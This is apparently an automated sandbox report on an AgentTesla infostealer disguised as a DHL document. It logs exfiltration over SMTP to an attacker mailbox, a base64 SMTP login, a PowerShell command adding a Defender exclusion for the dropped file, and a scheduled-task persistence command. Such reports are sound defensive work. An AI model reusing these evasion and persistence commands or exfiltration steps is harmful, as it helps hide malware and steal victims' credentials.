                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x888000x4f.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x8a0000x63c.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x8c0000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x868680x86a00False0.943954198584data7.94859375251IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x8a0000x63c0x800False0.33984375data3.51692249004IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x8c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_VERSION0x8a0900x3acdata
                                                                      RT_MANIFEST0x8a44c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Version Infos

                                                                      DescriptionData
                                                                      Translation0x0000 0x04b0
                                                                      LegalCopyrightCopyright Earthworks Garden Kare
                                                                      Assembly Version5.4.0.0
                                                                      InternalNameInternal.exe
                                                                      FileVersion5.4.0.0
                                                                      CompanyNameEarthworks Garden Kare
                                                                      LegalTrademarks
                                                                      CommentsPrecision Instrument
                                                                      ProductNameWpfClassProject
                                                                      ProductVersion5.4.0.0
                                                                      FileDescriptionWpfClassProject
                                                                      OriginalFilenameInternal.exe

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      12/02/21-19:32:20.315480TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49808587192.168.2.7208.91.198.143
                                                                      12/02/21-19:32:22.729091TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49809587192.168.2.7208.91.198.143

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 2, 2021 19:32:17.888190985 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:18.036181927 CET58749808208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:18.042073965 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:18.367084980 CET58749808208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:18.367422104 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:18.515599966 CET58749808208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:18.515629053 CET58749808208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:18.524950981 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:18.673876047 CET58749808208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:18.676012993 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:18.826030016 CET58749808208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:18.828859091 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:18.977768898 CET58749808208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:19.032696009 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:19.060048103 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:19.215567112 CET58749808208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:19.267081976 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:20.032210112 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:20.180629969 CET58749808208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:20.267163038 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:20.315479994 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:20.315615892 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:20.316972971 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:20.317080021 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:20.463584900 CET58749808208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:20.464925051 CET58749808208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:20.561315060 CET58749808208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:20.752240896 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:21.375482082 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:21.523803949 CET58749808208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:21.523827076 CET58749808208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:21.524194002 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:21.524243116 CET49808587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:21.525476933 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:21.672156096 CET58749808208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:21.673115015 CET58749809208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:21.673224926 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:21.824693918 CET58749809208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:21.825030088 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:21.972819090 CET58749809208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:21.972860098 CET58749809208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:21.973192930 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:22.121572971 CET58749809208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:22.122821093 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:22.272797108 CET58749809208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:22.273060083 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:22.421714067 CET58749809208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:22.422013998 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:22.577274084 CET58749809208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:22.578563929 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:22.726514101 CET58749809208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:22.728868008 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:22.729090929 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:22.729187012 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:22.729286909 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:22.729432106 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:22.729516983 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:22.729618073 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:22.729713917 CET49809587192.168.2.7208.91.198.143
                                                                      Dec 2, 2021 19:32:22.876816034 CET58749809208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:22.876892090 CET58749809208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:22.877068996 CET58749809208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:22.877270937 CET58749809208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:22.917869091 CET58749809208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:22.974479914 CET58749809208.91.198.143192.168.2.7
                                                                      Dec 2, 2021 19:32:23.017364979 CET49809587192.168.2.7208.91.198.143

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 2, 2021 19:32:17.543865919 CET5973053192.168.2.78.8.8.8
                                                                      Dec 2, 2021 19:32:17.700145960 CET53597308.8.8.8192.168.2.7
                                                                      Dec 2, 2021 19:32:17.715289116 CET5931053192.168.2.78.8.8.8
                                                                      Dec 2, 2021 19:32:17.875502110 CET53593108.8.8.8192.168.2.7

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Dec 2, 2021 19:32:17.543865919 CET192.168.2.78.8.8.80xbea3Standard query (0)smtp.4plqroup.comA (IP address)IN (0x0001)
                                                                      Dec 2, 2021 19:32:17.715289116 CET192.168.2.78.8.8.80x26d7Standard query (0)smtp.4plqroup.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Dec 2, 2021 19:32:17.700145960 CET8.8.8.8192.168.2.70xbea3No error (0)smtp.4plqroup.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                      Dec 2, 2021 19:32:17.700145960 CET8.8.8.8192.168.2.70xbea3No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                      Dec 2, 2021 19:32:17.700145960 CET8.8.8.8192.168.2.70xbea3No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                      Dec 2, 2021 19:32:17.700145960 CET8.8.8.8192.168.2.70xbea3No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                      Dec 2, 2021 19:32:17.700145960 CET8.8.8.8192.168.2.70xbea3No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                      Dec 2, 2021 19:32:17.875502110 CET8.8.8.8192.168.2.70x26d7No error (0)smtp.4plqroup.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                      Dec 2, 2021 19:32:17.875502110 CET8.8.8.8192.168.2.70x26d7No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                      Dec 2, 2021 19:32:17.875502110 CET8.8.8.8192.168.2.70x26d7No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                      Dec 2, 2021 19:32:17.875502110 CET8.8.8.8192.168.2.70x26d7No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                      Dec 2, 2021 19:32:17.875502110 CET8.8.8.8192.168.2.70x26d7No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)

                                                                      SMTP Packets

                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                      Dec 2, 2021 19:32:18.367084980 CET58749808208.91.198.143192.168.2.7220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                      Dec 2, 2021 19:32:18.367422104 CET49808587192.168.2.7208.91.198.143EHLO 284992
                                                                      Dec 2, 2021 19:32:18.515629053 CET58749808208.91.198.143192.168.2.7250-us2.outbound.mailhostbox.com
                                                                      250-PIPELINING
                                                                      250-SIZE 41648128
                                                                      250-VRFY
                                                                      250-ETRN
                                                                      250-STARTTLS
                                                                      250-AUTH PLAIN LOGIN
                                                                      250-AUTH=PLAIN LOGIN
                                                                      250-ENHANCEDSTATUSCODES
                                                                      250-8BITMIME
                                                                      250 DSN
                                                                      Dec 2, 2021 19:32:18.524950981 CET49808587192.168.2.7208.91.198.143AUTH login dmljYWxlZUA0cGxxcm91cC5jb20=
                                                                      Dec 2, 2021 19:32:18.673876047 CET58749808208.91.198.143192.168.2.7334 UGFzc3dvcmQ6
                                                                      Dec 2, 2021 19:32:18.826030016 CET58749808208.91.198.143192.168.2.7235 2.7.0 Authentication successful
                                                                      Dec 2, 2021 19:32:18.828859091 CET49808587192.168.2.7208.91.198.143MAIL FROM:<vicalee@4plqroup.com>
                                                                      Dec 2, 2021 19:32:18.977768898 CET58749808208.91.198.143192.168.2.7250 2.1.0 Ok
                                                                      Dec 2, 2021 19:32:19.060048103 CET49808587192.168.2.7208.91.198.143RCPT TO:<vicalee@4plqroup.com>
                                                                      Dec 2, 2021 19:32:19.215567112 CET58749808208.91.198.143192.168.2.7250 2.1.5 Ok
                                                                      Dec 2, 2021 19:32:20.032210112 CET49808587192.168.2.7208.91.198.143DATA
                                                                      Dec 2, 2021 19:32:20.180629969 CET58749808208.91.198.143192.168.2.7354 End data with <CR><LF>.<CR><LF>
                                                                      Dec 2, 2021 19:32:20.317080021 CET49808587192.168.2.7208.91.198.143.
                                                                      Dec 2, 2021 19:32:20.561315060 CET58749808208.91.198.143192.168.2.7250 2.0.0 Ok: queued as 23368782367
                                                                      Dec 2, 2021 19:32:21.375482082 CET49808587192.168.2.7208.91.198.143QUIT
                                                                      Dec 2, 2021 19:32:21.523803949 CET58749808208.91.198.143192.168.2.7221 2.0.0 Bye
                                                                      Dec 2, 2021 19:32:21.824693918 CET58749809208.91.198.143192.168.2.7220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                      Dec 2, 2021 19:32:21.825030088 CET49809587192.168.2.7208.91.198.143EHLO 284992
                                                                      Dec 2, 2021 19:32:21.972860098 CET58749809208.91.198.143192.168.2.7250-us2.outbound.mailhostbox.com
                                                                      250-PIPELINING
                                                                      250-SIZE 41648128
                                                                      250-VRFY
                                                                      250-ETRN
                                                                      250-STARTTLS
                                                                      250-AUTH PLAIN LOGIN
                                                                      250-AUTH=PLAIN LOGIN
                                                                      250-ENHANCEDSTATUSCODES
                                                                      250-8BITMIME
                                                                      250 DSN
                                                                      Dec 2, 2021 19:32:21.973192930 CET49809587192.168.2.7208.91.198.143AUTH login dmljYWxlZUA0cGxxcm91cC5jb20=
                                                                      Dec 2, 2021 19:32:22.121572971 CET58749809208.91.198.143192.168.2.7334 UGFzc3dvcmQ6
                                                                      Dec 2, 2021 19:32:22.272797108 CET58749809208.91.198.143192.168.2.7235 2.7.0 Authentication successful
                                                                      Dec 2, 2021 19:32:22.273060083 CET49809587192.168.2.7208.91.198.143MAIL FROM:<vicalee@4plqroup.com>
                                                                      Dec 2, 2021 19:32:22.421714067 CET58749809208.91.198.143192.168.2.7250 2.1.0 Ok
                                                                      Dec 2, 2021 19:32:22.422013998 CET49809587192.168.2.7208.91.198.143RCPT TO:<vicalee@4plqroup.com>
                                                                      Dec 2, 2021 19:32:22.577274084 CET58749809208.91.198.143192.168.2.7250 2.1.5 Ok
                                                                      Dec 2, 2021 19:32:22.578563929 CET49809587192.168.2.7208.91.198.143DATA
                                                                      Dec 2, 2021 19:32:22.726514101 CET58749809208.91.198.143192.168.2.7354 End data with <CR><LF>.<CR><LF>
                                                                      Dec 2, 2021 19:32:22.729713917 CET49809587192.168.2.7208.91.198.143.
                                                                      Dec 2, 2021 19:32:22.974479914 CET58749809208.91.198.143192.168.2.7250 2.0.0 Ok: queued as 7B88778029D

                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Start time:19:30:31
                                                                      Start date:02/12/2021
                                                                      Path:C:\Users\user\Desktop\Dhl Document 7348255141.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Dhl Document 7348255141.exe"
                                                                      Imagebase:0x40000
                                                                      File size:554496 bytes
                                                                      MD5 hash:7FC06B21DB75238CF0245B5264986778
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.277404295.0000000003441000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.277404295.0000000003441000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.276321285.0000000002557000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.275750377.000000000245A000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      General

                                                                      Start time:19:30:38
                                                                      Start date:02/12/2021
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe
                                                                      Imagebase:0x1110000
                                                                      File size:430592 bytes
                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Reputation:high

                                                                      General

                                                                      Start time:19:30:38
                                                                      Start date:02/12/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff774ee0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:19:30:38
                                                                      Start date:02/12/2021
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dlBewoIRuDWOY" /XML "C:\Users\user\AppData\Local\Temp\tmpAE43.tmp
                                                                      Imagebase:0x1310000
                                                                      File size:185856 bytes
                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:19:30:39
                                                                      Start date:02/12/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff774ee0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:19:30:40
                                                                      Start date:02/12/2021
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Imagebase:0x4d0000
                                                                      File size:45152 bytes
                                                                      MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.273012990.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.273012990.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.518116034.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.518116034.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.273408189.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.273408189.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.272519119.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.272519119.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.271895196.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.271895196.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.526268969.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.526268969.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >